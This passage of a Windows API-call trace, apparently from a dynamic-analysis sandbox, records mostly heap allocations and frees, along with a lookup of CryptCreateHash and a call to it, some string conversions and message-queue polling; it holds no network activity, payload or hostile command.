Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0204.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0204.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0204.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0204.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0204.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0204.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0204.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0204.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0204.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e509c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0204.452] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0204.452] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0204.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0204.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0204.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0204.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0204.516] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0204.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0204.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e08 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0204.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0204.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0204.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0204.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0204.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0204.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0204.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0204.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0204.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0204.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0204.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d78 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 